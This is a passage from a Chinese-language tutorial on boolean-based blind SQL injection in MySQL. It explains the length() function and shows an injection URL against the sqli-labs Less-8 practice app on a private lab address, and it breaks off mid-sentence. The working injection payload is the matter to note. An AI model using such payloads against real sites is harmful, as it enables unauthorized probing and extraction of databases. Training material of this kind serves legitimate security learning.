1、 基于布尔的盲注
length 函数的使用方法:用于在 MySQL 中计算字段的长度,一个汉字是算 3 个字符,一个数字或字 母算 1 个字符。
例: MariaDB [security]> select username,password from users where id=1 and ( length(database()) = 8);
下面进行 sql 注入:
Less-8 到 Less10 都是 GET 方式的盲注,只是闭合的方式不太一样。
http://192.168.98.66/sqli-labs/Less-8/?id=1' and (length(database())=8)--+
出现you are in 说